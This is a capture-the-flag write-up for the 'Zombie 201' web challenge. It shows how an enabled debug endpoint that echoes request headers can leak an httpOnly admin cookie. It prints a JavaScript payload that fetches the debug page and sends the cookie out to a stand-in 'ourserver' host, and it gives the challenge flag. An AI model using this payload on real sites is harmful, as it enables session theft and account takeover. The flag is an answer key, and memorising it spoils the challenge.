Zombie 201 - Web
Description
Congratulations, you got the admin’s cookie! Can you do it again? It might be a little harder this time. You are well on your way through the gauntlet. You can’t stop now.
The task is the same as previous part “Zombie 101” challenge. All the files are the same, only the configuration is different.
From docker-compose.yml file on line 9 we can see the configuration file changed.
configFile: '{"flag": "wctf{redacted}", "httpOnly": true, "allowDebug": true}'
In the previous part of the challenge httpOnly was set to false, who left us retrieve the admin cookie via js.
We can also see that the allowDebug
option is still set to true.
Here the /debug
endpoint code :
app.get('/debug', function(req, res) {
if (config.allowDebug) {
res.send({"remote-ip": req.socket.remoteAddress, ...req.headers})
}
else {
res.send('sorry, debug endpoint is not enabled')
}
})
As allowDebug
is set to true we might want to use that endpoint in order to leak the admin cookie.
Lets craft our payload, so we want :
- admin fetch
/debug
endpoint - parse result as json
- retrieve
cookie
entry - exfiltrate the cookie
Here the final payload :
//Fetch debug page
fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug").then(
function(response) {
//get result as json
return response.json();
}
).then(
function(data) {
//get cookie entry and exfiltrate
window.location.href = "http://ourserver/?c=".concat(data['cookie']);
}
);
Send it to admin via /visit
endpoint and get the flag :+1:
here the flag : wctf{h1dd3n-c00k135-d1d-n07-h31p-373964}